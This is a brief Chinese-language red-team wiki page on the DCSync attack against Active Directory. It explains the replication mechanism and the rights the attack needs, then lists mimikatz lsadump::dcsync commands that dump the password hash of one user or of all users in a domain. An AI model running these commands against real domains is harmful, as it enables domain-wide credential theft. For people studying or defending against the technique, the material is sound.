DCSync

目的

获取域内用户hash

原理

域环境中，不同DC之间每15分钟会有一次域数据同步
当DC1想从其他域控制器(DC2)同步数据时,DC1会向DC2发起一个 GetNCChanges 请求，该请求保活需要同步的数据，如果数据较多，会重复该过程，DCSync 就是利用的这个原理，通过 Directory Replication Service（DRS）服务的 GetNCChanges 接口向域控发起数据同步请求
DCSync 攻击的对象如果是只读域控制器 (RODC)，则会失效
没有DCSync想要获取域用户hash必须登录域控制器

利用条件

拥有以下ACE的域用户
	复制目录更改（DS-Replication-Get-Changes）
	全部复制目录更改 (DS-Replication-Get-Changes-All )
	在过滤集中复制目录更改(可有可无)（DS-Replication-Get-Changes-In-Filtered-Set）

默认拥有该权限的用户:
Administrators
Domain Controllers
Enterprise Domain Admins

利用手法

Previous域缓存凭据爆破 NextAS REPRoasting

Last updated 2 years ago

privilege::debug

# 导出域内指定用户的信息(包括哈希值)
lsadump::dcsync /domain:fbi.gov /user:administrator 
lsadump::dcsync /domain:fbi.gov /user:administrator /csv
# 导出域内所有用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /all
lsadump::dcsync /domain:whoamianony.org /all /csv